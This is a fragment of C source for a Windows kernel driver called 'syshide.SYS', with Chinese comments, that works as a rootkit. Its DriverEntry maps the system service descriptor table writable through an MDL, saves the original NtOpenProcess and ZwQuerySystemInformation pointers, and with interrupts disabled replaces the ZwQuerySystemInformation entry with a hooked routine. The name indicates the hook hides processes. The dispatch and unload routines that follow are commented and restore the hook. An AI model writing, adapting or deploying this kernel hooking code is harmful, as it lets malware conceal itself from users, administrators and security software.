NTSTATUS ntStatus;
UNICODE_STRING deviceNameUnicodeString;
PDEVICE_EXTENSION deviceExtension;
UNICODE_STRING deviceLinkUnicodeString;
UNICODE_STRING DestinationString;
dprintf("syshide.SYS: entering DriverEntry\n");
//
// A real driver would:
//
// 1. Report it's resources (IoReportResourceUsage)
//
// 2. Attempt to locate the device(s) it supports
// 代码
// 保存原系统调用位置
// 映射我们的区域
g_pmdlSystemCall = MmCreateMdl(NULL, KeServiceDescriptorTable.ServiceTableBase, KeServiceDescriptorTable.NumberOfServices*4);
if(!g_pmdlSystemCall)
{
return STATUS_UNSUCCESSFUL;
}
MmBuildMdlForNonPagedPool(g_pmdlSystemCall);
// 改变MDL的flags
g_pmdlSystemCall->MdlFlags = g_pmdlSystemCall->MdlFlags | MDL_MAPPED_TO_SYSTEM_VA;
//在内存中索定,不让换出
g_MappedSystemCallTable = MmMapLockedPages(g_pmdlSystemCall, KernelMode);
// 获取KeServiceDescriptorTable
RtlInitUnicodeString(&DestinationString, L"KeServiceDescriptorTable");
g_pKeServiceDescriptorTable = (unsigned long)MmGetSystemRoutineAddress(&DestinationString);
DbgPrint("g_pKeServiceDescriptorTable\t%.8X\n",g_pKeServiceDescriptorTable);
DbgPrint("KeServiceDescriptorTable\t%.8X\n",KeServiceDescriptorTable);
// 保存原始NtOpenProcess
g_pOriNtOpenProcess = (ZWOPENPROCESS)SYSTEMSERVICE(ZwOpenProcess);
g_pOriNtQuerySystemInformation = (ZWQUERYSYSTEMINFORMATION)SYSTEMSERVICE(ZwQuerySystemInformation);
DbgPrint("g_pOriNtOpenProcess\t%.8X\n",g_pOriNtOpenProcess);
DbgPrint("g_pOriNtQuerySystemInformation\t%.8X\n",g_pOriNtQuerySystemInformation);
//
// OK, we've claimed our resources & found our h/w, so create
// a device and initialize stuff...
//
RtlInitUnicodeString(&deviceNameUnicodeString, NT_DEVICE_NAME);
//
// Create an EXCLUSIVE device, i.e. only 1 thread at a time can send
// i/o requests.
//
ntStatus = IoCreateDevice(DriverObject, sizeof(DEVICE_EXTENSION),
&deviceNameUnicodeString, FILE_DEVICE_syshide,
0, TRUE, &deviceObject);
if ( NT_SUCCESS(ntStatus) )
{
deviceExtension = (PDEVICE_EXTENSION)deviceObject->DeviceExtension;
//
// Set up synchronization objects, state info,, etc.
//
//
// Create a symbolic link that Win32 apps can specify to gain access
// to this driver/device
//
RtlInitUnicodeString(&deviceLinkUnicodeString, DOS_DEVICE_NAME);
ntStatus = IoCreateSymbolicLink(&deviceLinkUnicodeString, &deviceNameUnicodeString);
if ( !NT_SUCCESS(ntStatus) )
{
dprintf("syshide.SYS: IoCreateSymbolicLink failed\n");
}
//
// Create dispatch points for device control, create, close.
//
DriverObject->MajorFunction[IRP_MJ_CREATE] =
DriverObject->MajorFunction[IRP_MJ_CLOSE] =
DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = DrvDispatch;
DriverObject->DriverUnload = DrvUnload;
}
OldZwQuerySystemInformation =(ZWQUERYSYSTEMINFORMATION)(SYSTEMSERVICE(ZwQuerySystemInformation));
_asm cli
(ZWQUERYSYSTEMINFORMATION)(SYSTEMSERVICE(ZwQuerySystemInformation))= NewZwQuerySystemInformation;
_asm sti
if ( !NT_SUCCESS(ntStatus) )
{
//
// Something went wrong, so clean up (free resources, etc.)
//
if (deviceObject) IoDeleteDevice(deviceObject);
}
return ntStatus;
}
/*++
Routine Description:
Process the IRPs sent to this device.
Arguments:
DeviceObject - pointer to a device object
Irp - pointer to an I/O Request Packet
Return Value:
NTSTATUS - the status that was stored in Irp->IoStatus.Status before the IRP was completed
--*/
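/*
 * DrvDispatch - handle IRP_MJ_CREATE, IRP_MJ_CLOSE and IRP_MJ_DEVICE_CONTROL
 * for the syshide device. DriverEntry points all three MajorFunction slots
 * at this single routine.
 *
 * DeviceObject - the device the IRP was sent to (not consulted here)
 * Irp          - the request; it is always completed before returning
 *
 * Returns the NTSTATUS written to Irp->IoStatus.Status before the IRP was
 * completed. Nothing is ever left pending, so the status is always final.
 */
NTSTATUS DrvDispatch(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp)
{
    PIO_STACK_LOCATION irpStack;
    NTSTATUS ntStatus;

    (void)DeviceObject;   /* the device extension is not used by this routine */

    /* Default to success with no bytes transferred; individual cases override. */
    Irp->IoStatus.Status = STATUS_SUCCESS;
    Irp->IoStatus.Information = 0;

    /* The current stack location carries the major function and the IOCTL parameters. */
    irpStack = IoGetCurrentIrpStackLocation(Irp);

    switch (irpStack->MajorFunction)
    {
    case IRP_MJ_CREATE:
        dprintf("syshide.SYS: IRP_MJ_CREATE\n");
        break;

    case IRP_MJ_CLOSE:
        dprintf("syshide.SYS: IRP_MJ_CLOSE\n");
        break;

    case IRP_MJ_DEVICE_CONTROL:
        dprintf("syshide.SYS: IRP_MJ_DEVICE_CONTROL\n");
        switch (irpStack->Parameters.DeviceIoControl.IoControlCode)
        {
        case IOCTL_syshide_HELLO:
            /*
             * Some app is saying hello. No data is exchanged, so the
             * system buffer and its lengths are deliberately not read.
             * Any future IOCTL that reads or writes
             * Irp->AssociatedIrp.SystemBuffer must first check
             * Parameters.DeviceIoControl.InputBufferLength /
             * OutputBufferLength: the request comes from whatever
             * user-mode caller was able to open the device.
             */
            break;

        default:
            Irp->IoStatus.Status = STATUS_INVALID_PARAMETER;
            dprintf("syshide.SYS: unknown IRP_MJ_DEVICE_CONTROL\n");
            break;
        }
        break;

    default:
        /*
         * Not reachable while only CREATE/CLOSE/DEVICE_CONTROL are routed
         * here, but fail closed instead of reporting success if the
         * dispatch table is ever extended without updating this switch.
         */
        Irp->IoStatus.Status = STATUS_INVALID_DEVICE_REQUEST;
        break;
    }

    /*
     * Read the status before completing the request: the IRP may be gone
     * as soon as IoCompleteRequest returns, so it must not be touched after.
     */
    ntStatus = Irp->IoStatus.Status;
    IoCompleteRequest(Irp, IO_NO_INCREMENT);

    return ntStatus;
}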
/*++
Routine Description:
Free all the allocated resources, etc.
Arguments:
DriverObject - pointer to a driver object
Return Value:
None
--*/
/*
 * DrvUnload - undo what DriverEntry set up, in reverse order: put the
 * saved ZwQuerySystemInformation entry back into the service table,
 * remove the symbolic link that user mode opens, then delete the device.
 *
 * DriverObject - the driver being unloaded. DriverEntry only registers
 *                this routine after IoCreateDevice succeeded, so
 *                DriverObject->DeviceObject is the device created there.
 */
VOID DrvUnload(IN PDRIVER_OBJECT DriverObject)
{
    UNICODE_STRING dosLinkName;

    /*
     * Restore the original service-table entry.
     * NOTE(review): cli/sti only masks interrupts on the processor running
     * this code; it does not serialize other processors against the table
     * write, so on a multiprocessor system this is not a full synchronization.
     */
    _asm cli
    (ZWQUERYSYSTEMINFORMATION)(SYSTEMSERVICE(ZwQuerySystemInformation)) = OldZwQuerySystemInformation;
    _asm sti

    /* Tear down the link so the device can no longer be opened by name from Win32. */
    RtlInitUnicodeString(&dosLinkName, DOS_DEVICE_NAME);
    IoDeleteSymbolicLink(&dosLinkName);

    /* Finally drop the device object itself. */
    IoDeleteDevice(DriverObject->DeviceObject);

    dprintf("syshide.SYS: unloading\n");
}